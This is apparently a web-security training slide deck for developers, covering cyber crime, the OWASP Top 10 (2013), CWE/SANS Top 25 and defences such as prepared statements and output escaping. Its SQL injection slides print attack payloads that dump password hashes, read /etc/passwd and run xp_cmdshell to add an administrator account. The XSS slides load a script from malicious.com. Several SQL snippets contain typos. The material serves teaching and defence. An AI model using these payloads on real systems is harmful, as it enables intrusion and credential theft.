Web Application Security Session for Web Developers

WebApplication Security
For Web Developers

Learning Agenda
• Cyber Crime & Security
• Web Architecture
• OWASPTop 10Vulnerabilities
• Protection

Information,Technology & Society
• The Information is the data that is of interest
• The Technology used to create, communicate, distribute, manipulate, store
or destroy information
• The technology is any mechanism capable of data processing
• The Society is a group of people involved in social interaction
• Becoming socialized means learning what kind(s) of behavior is appropriate
in given situation
• Society and IT and co-evolving and impact each other

Trends in Digitization
• Storing social and intellectual interactions
• Gathering and synthesizing information that was disconnected
• Higher expectations from technology than people

Cyber Crime
• Cyber crimes can involve criminal activities
that are traditional in nature, such as theft,
fraud, forgery, defamation and mischief, all
of which are subject to the Indian Penal
Code/US Federal Law
• The abuse of computers has also given birth
to a gamut of new age crimes that are
addressed by Laws

Types of Cyber Crime
• Hacking (illegal intrusion into a system/network)
• Denial of Service attack
• Virus dissemination
• CyberTerrorism
• Software piracy

Purpose of Cyber Crime
• Financial Fraud
• Damage to data/system/network
• Theft of proprietary information
• System penetration
• Denial of Service
• Unauthorized access
• Abuse of privileges
• Spreading viruses

What is Cyber Security?
• Cybersecurity is a subset of information
security; the practice of defending
data/information (electronic or physical)
from unauthorized access, use, disclosure,
disruption, modification, perusal,
inspection, recording or destruction
• Shared responsibility between merchants
and users
• Cyber security involves protecting that
information by preventing, detecting, and
responding to attacks.
Source: https://en.wikipedia.org/wiki/Information_security

What is Cyber Security?
• Cyber Security are the processes employed to
safeguard and secure assets used to carry
information of an organization from being
stolen or attacked.
• It requires extensive knowledge of the possible
threats such asVirus or such other malicious
objects.
• Identity management, risk management and
incident management form the crux of cyber
security strategies of an organization.

Goals of Cyber Security
• Confidentiality
• Making sure that we keep our data and our information private from those who do not
“need to know”
• Integrity
• Making sure that our data is not tampered with, so that any information we send or
receive is accurate and truthful
• Availability
• Making sure that we, our clients and anyone else who needs to get to our data is able
to easily and securely access it

Why Cyber SecurityTraining?
• Business Continuity &Trust factor
• Protection of data and systems
• Prevention of unauthorized access
• Safeguarding Personally Identifiable Information
• Reduces security related risks upto 75%

Popular Hacks
• Burger KingTwitter account (2013)
• Twitter defaced by Iranian CyberArmy (2009)
• ESPN site decorated with cute unicorns (2009)
• Sony pictures data breach(2011), sql injection compromised passwords
• EBay data breach (2014)
• Many site defacements

Sources of Attacks
• Virus /Worms / *-wares (Executables)
• Social Engineering (Phishing)
• Hackers who are very patient
• PEOPLE !!

Why web application security?
• 75% of attacks target Application layer through internet (Gartner)
• 95% of web applications have some sort of vulnerability (Imperva)
• 78% of easily exploitable weakness occur in web applications(Symantec)
• 67% of websites, used to distribute malware, are legitimate, compromised
websites (Symantec)

Revision of web architecture
• Setup
• Firewall
• Load balancer
• Webserver (Reverse Proxy)
• Application (.NET, Java, PHP, Perl)
• Database (SQL Server, Oracle, MySQL)

• Development
• Model
• View
• Controller
• Application Anatomy
• HTML and JavaScript
• CRUD Operations
• External/internal libraries/components

• Request Methods
• GET, POST, HEAD, PUT,TRACE, OPTIONS, DELETE
• HTTP & HTTPS
• FTP, SFTP
• SSH

WAPT
• Web Application PenetrationTesting
• Evaluate computer/server and network security
• Identify flaws and vulnerabilities
• Design or implementation flaw
• Attack possibility
• SQL Injection, CSRF, XSS, File inclusion, User enumeration
• Uses negative test data

OpenWeb Application Security Project
• Non profit organization and Open Community
• Purpose: Be the thriving global community that drives visibility and
evolution in the safety and security of the world’s software.
• Website - https://www.owasp.org

OWASP Projects
• Enterprise Security API (ESAPI)
• Collection of all the security methods that a developer needs to build a secure web
application
• Zed Attack Proxy (ZAP)
• Easy to use integrated penetration testing tool for finding vulnerabilities in web
applications
• Security Shepherd
• CBT application for web and mobile application security awareness and education
• Development Guide
• Massive document covering all aspects of web application and web service security

OWASP 2013Top 10 List
• A1-Injection
• A2-BrokenAuthentication and Session Management
• A3-Cross-Site Scripting (XSS)
• A4-Insecure Direct Object References
• A5-Security Misconfiguration
• A6-Sensitive Data Exposure
• A7-Missing Function LevelAccess Control
• A8-Cross-Site Request Forgery (CSRF)
• A9-Using Components with KnownVulnerabilities
• A10-Unvalidated Redirects and Forwards
• (Additional) A6/2007: Information Leakage and improper Error handling
https://www.owasp.org/index.php/Top_10_2013-Top_10

CWE/SANSTop 25
Rank Name
[1] Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
[2] Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[3] Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4] Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
[5] Missing Authentication for Critical Function
[6] Missing Authorization
[7] Use of Hard-coded Credentials
[8] Missing Encryption of Sensitive Data
[9] Unrestricted Upload of File with Dangerous Type
[10] Reliance on Untrusted Inputs in a Security Decision
[11] Execution with Unnecessary Privileges
[12] Cross-Site Request Forgery (CSRF)

CWE/SANSTop 25
Rank Name
[13] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[14] Download of Code Without Integrity Check
[15] Incorrect Authorization
[16] Inclusion of Functionality from Untrusted Control Sphere
[17] Incorrect Permission Assignment for Critical Resource
[18] Use of Potentially Dangerous Function
[19] Use of a Broken or Risky Cryptographic Algorithm
[20] Incorrect Calculation of Buffer Size
[21] Improper Restriction of Excessive Authentication Attempts
[22] URL Redirection to Untrusted Site ('Open Redirect')
[23] Uncontrolled Format String
[24] Integer Overflow or Wraparound
[25] Use of a One-Way Hash without a Salt

Primary Protection
• 4 basic rules for all visible pages
• Authentication
• Authorization
• Validation
• Sanitization
• Common approach with exception handling
• Disable or limit detailed error messages
• Ensure that secure paths return similar or identical error messages
• Create a default error handler which sanitizes error messages
• IDS and IPS
• Don’t be lazy to check "ALL” !!

Example: Failed login message
• Compare this message
• Notice: Username does not exist
• Notice: Password was not correct
• With this
• Notice: Invalid credentials

A1: SQL Injection attack
• Use special characters to check
• Quotes, double quotes, slashes, dashes, HTML tags
• Modern attack techniques are automated
• Blind condition SQLi
• Information gathering
• Error based analysis
• Output mechanism
• Understanding the query
• Determine the database type
• Find out user access level
• Determine the OS

• Finding user privilege level
• ‘ and 1 in (select user) –-
• ‘; if user =‘dbo’ wait for delay ‘0:0:5’ –
• ‘ union select if( user() like ‘root@%’
• Default admin accounts
• sa, system, sys, dba, admin, root and many others

• All tables and columns in one query
• ‘ union select 0, sysobjects.name + ‘:’ +syscolumns.name + ‘: ‘ + systypes,name, 1, 1,‘1’.
1, 1, 1, 1, 1 from sysobjects, syscolumns,systypes where sysobjects.xtype = ‘U’
ANDsysobjects.id = syscolumns,idANDSyscolumns.xtype = systypes.xtype –
• File location of databases
• ‘ and 1 in (select min(filename) from master.dbo.sysdatabases where filename >’.’) –-
• Getting user names and passwords
• ‘; begin declare @var varchar(8000) set @var=‘:’ select @var=@var+’
’+login+’/’+password+’ ‘ from users where login>@var select @var as var into temp end
--

• The hashes are extracted using
• SELECT password FROM master..sysxlogins
• Then hex each hash
• Begin @charvalue=‘0x’, @i=1,
@length=datalength(@binvalue),
@hexstring = ‘0123456789ABCDEF’
While (@i<=@lenght) BEGIN
declare @tempint int, @firstint int, @secondint int
select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i1))
select @firstint=FLOOR(@tempint/16)
select @secondint=@tempint – (@firstint*16)
select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING
(@hexstring, @secondint+1, 1) Select @i=@i+1
END
• And then we just cycle through all passwords

‘; begin declare @ var varchar(8000), @xdate1 datetime, @binvalue varbinary(255),
@charvalue varchar(255), @ int, @length int, @hexstring char(16) set @var=‘:’ select
@xdate1=(select min(xdate1) from master.dbo.syslogins where password is not null) begin
while @xdate1 <= (select max (xdate1) from master.dbo.sysxlogins where password is not
null) begin select @binvalue=(select password from master.dbo.sysxlogins where
Xdate1=@xdate1), @charvalue = ‘0x’, @i=1 @length=datalength( @binvalue), @hextring
=‘0123456789ABCDEF’ while (@i<=@length) begin declare @tempint int, @firstint int,
@secondint int select @tempint=CONVERT(int, SUBSTRING( @binvalue,@i,1)) select
@firstint=FLOOR(@tempint/16) select @secondint=@tempint - ( @firstint*16) select
@charvalue=@charvalue + SUBSTRING ( @hextring,@firstint+1,1) + SUBSTRING (
@hexstring, @secondint+1,1) select @i=@i+1 end select @var=@var+’/
‘+name+’/’+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1
= (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@sdate1 and
password is not null) end select @var as x into temp end end --

• Brute forcing passwords
• create table tempdb..passwords( pwd varchar(255) )
• bulk insert tempdb..passwords from ‘c:/temp/passwords.txt’
• select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare(
pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where
(pwdcompare(name, sysxlogins.password, 0 ) = 1) union select sysxlogins,name, null
from sysxlogins join syslogins on sysxlogins.sid= where sysxlogins.password is null and
syslogins.isntgroup=0and syslogins.isntuser=0
• drop table tempdb..passwords

• Uploading files (lengthy sql query)
• ‘declare @hex varchar(8000), bin varchar(8000) select @hex = ‘4d5a900003000... 8000 hex
chars ...0000000000000000000’
exec master..sp_hex2bin @hex, @bin output ;
insert master..pwdump2
select @bin --
• Inject binary as hex in 4000 byte chunks

• MySQL OS Interaction
• LOAD_FILE
‘union select 1,load_file(‘/etc/passwd’),1,1,1;
• LOAD DATA INFILE
create table temp( line blob);
load date infile ‘/passwd’ into table temp;
select * from temp;
• SELECT INTO OUTFILE
• Server name and configuration
• ‘ and 1 in (select @@servername ) –
• ‘and 1 in (select srvname from master..sysservers )

• Linux OS based MySQL
• ‘ union select 1, (load_file(‘/etc/passwd’)),1,1,1;
• MS SQLWindows Password Creation
• ‘ exec xp_cmdshell ‘net user /add victor Pass123’—
‘;exec xp_cmdshell ‘net localgroup /add administrators victor’ –
• Stopping OS Services
• ‘; exec master..xp_servicecontrol ‘ start’, FTP Publishing’ --

A1: SQL Injection - Protection
• Escape special characters
• Validate input data types
• Avoid plain string concatenation
• Use prepared statements
• Enforce least privileges for application's database user
• PerformWhitelist input validation on all input
• Allow only the data that is of expected length

A2: Broken Authentication
• Exposure of SESSION ID
• Considering SESSION ID's data acceptable
• Pages without authorization checks
• Not confirming user actions
• Not HTTPS? Beware !!

A2: Broken Authentication - Protection
• Centralized & standardized authentication
• Use standard session ID of your container
• Protect credentials and Session ID with SSL/TLS
• Keep your SSL certificate safe
• Automatically logout inactive sessions
• Use supplemental authentications (OTP, Captchas, etc)
• Expire/remind old passwords and have strong password policy
https://howsecureismypassword.net/

A3: Cross Site Scripting (XSS)
• Code in text field
• "Every" web application has this problem
• By-passed client side validations
• Two types
• Reflected XSS
• Stored XSS

• Query:
• http://vulnerable.com/search/my+search
• Result:
...<body>
<p>Search results for <strong>my search</strong></p>
...
• Query:
• http://vulnerable.com/search/<script src=http://malicious.com/script.js></script>
• Result:
...
<p>Search results from <strong><script src=http://malicious.com/script.js></script></p>
...

• If an attacker submits a comment
• <script>alert(‘HelloVictim!’);</script>
• The result may look like
• <div class=comments>
<div>This post is awesome!</div>
<div><script>alert(‘HelloVictim!’);</script></div>
• Embedded binaries are possible
• data:’text/html;base64,PHNjcmlwdD5hbGVydCgiS·
GkgdGhlcmUgOlAiKTs8L3NjcmlwdD4=

A3: Cross Site Scripting (XSS) - Protection
• Don’t include input in your output “as it is”
• Perform whitelist input validation
• Escape special characters
• Use Sanitizer (consider OWASP HTML Sanitizer)

A4: Insecure Direct Object Reference
• Failure to restrict URL access
• Hiding object references in hidden fields
• Giving access control to presentation layer
• Exposing unauthorized files/data
• E.g. https://accounts.mycompany.com/download?file=payslips/payslip_112233.pdf

A4: Insecure Direct Object Reference - Protection
• Verify parameter value format
• Eliminate Direct Object references
• Use Access reference maps
• E.g. https://accounts.mycompany.com/download?file=K62a8129
• Verify user authorization to access target object
• Verify requested mode on the target object (read, write, delete, etc)

A5: Security Misconfiguration
• Is your source code really secret?
• Is your database access restricted?
• Is your server hardened?

A5: Security Misconfiguration
• Missing OS/Server
patches
• Flaws in non-
upgraded application
patches
• Unauthorized access
to functionality/data
• Insider threat

A5: Security Misconfiguration - Protection
• Verify systems’ configuration management
• "Hardening" is done?
• Update/upgrade dependent software libraries
• Deactivate unnecessary ports, services, accounts, sites, etc.
• Scan regularly

A6: Sensitive Data Exposure
• Failure to identify source and destination of sensitive data
• Attackers extract secrets to use in additional attacks
• Impact on cleaning up the incident
• Storing plain passwords in code
• Usage of weak algorithms : MD5, SHA-1, RC3, RC4

A6: Sensitive Data Exposure - Protection
• Identify all sensitive data and their locations
• Use AES, RSA, SHA-256
• Generate, distribute and protect keys and change them often
• Verify your implementation !!
• Be careful with unknown networks: Hotspots, FreeWIFI zones, Internet
cafes, etc.

A7: Missing Function level action control
• Attackers invoke actions they are not authorized for
• Performing privileged actions

A7: Missing Function level action control -
Protection
• Restrict access to authenticated users
• Enforce user or role based permissions
• Disallow requests to unauthorized page types: config, log, source files, etc.

A8: Cross Site Request Forgery
• Tricking browser to load vulnerable URL
• Browsers include authentication data in each request
• Impact: Access sensitive data and change account details
• Sites relying only on credentials are vulnerable
• XSS plays well with CSRF

A8: Cross Site Request Forgery - Protection
• Use CSRFTokens
• Store token in session and validate the posted token
• Implement XSS protection

A9: Using known vulnerable components
• Attackers identify weak component and customize attack
• Libraries/framework components which are not trusted

A9: Using known vulnerable components - Protection
• Identify components, versions and dependencies
• Monitor the activity of these components
• Update them regularly
• Restrict use of unapproved components

A10: Unvalidated redirects and forwards
• Common usage of URL redirects attaching input data
• Forwarding with parameters skipping authentication

A10: Unvalidated redirects and forwards - Protection
• Avoid using redirects
• Don’t involve user parameters to define target URL
• Whitelist parameter types and destination URLs
• Verify access of the user before forwarding
• Check user access on all pages

Secure Software Development Lifecycle
• Consider security aspects when designing solution
• Understand common vulnerabilities
• Write clean code
• Perform code security scans & code reviews
• Never trust any user input !!
• Perform penetration test

OWASP Zed Attack Proxy
• Open source blackbox security scanner
• Free and Easy to use
• Ideal for beginners and professionals
• Cross platform (Java)
• Intended for developers

ZAP features
• Intercepting proxy
• Active and Passive scanners
• Spiders (for HTML and Ajax)
• Report generation
• Brute force
• Session Awareness
• API (clients exist for Java, Python, Node.js, PHP)

WAPT Softwares
• Web proxy
• BURP
• Paros
• Webscarab
• Fuzzing
• WS Fuzzer
• Scanners
• W3AF
• Zap

Best Practices
• Embed security measures while coding
• Filter and sanitize input data
• Encrypt sensitive files
• Report any potential breach
• Never let someone have access to your system with your credentials
• Always logoff or lock your system if you leave (even for a minute)

Conclusion
• Web applications are always under attack
• Protect your company information, assets & your information
• New threats will emerge with technology advancements
• Get Informed & Get Involved
• Trust your instincts: If something feels wrong, it is. Report the issues and ask
for help if necessary
• Be an advocate for security … speak up!

Glossary
• Access Point
• Asset
• Adware
• Algorithm
• Attack
• Availability
• Authentication
• Authorization
• Backdoor
• Botnet
• Brute force Attack
• Cryptography
• Cyberwar
• Compliance
• Data Leakage
• DoS, DDoS
• Digital Certificate
• Encyption
• Evidence
• Exploit
• Firewall
• Forensics
• Freeware
• Governance
• Hardening
• Hijack
• HTTP/HTTPS
• Identity
• Incident
• Intrusion (IDS&IPS)
• MAC address

Glossary
• Password
• Penetration
• Phishing
• Port
• Protocol
• Proxy Server
• Reverse Engineering
• Routers
• Scan
• Security Plan
• Signature
• Spam
• Spoof
• Script Injection
• Tamper
• Threat
• Trojan Horse
• User
• URI & URL
• Virus
• Virtual Private
Network
• Web Server
• Zero-dayAttack
• Zombie Computer

Web Application Security Session for Web Developers

More Related Content

What's hot

Similar to Web Application Security Session for Web Developers

Recently uploaded

Web Application Security Session for Web Developers

Editor's Notes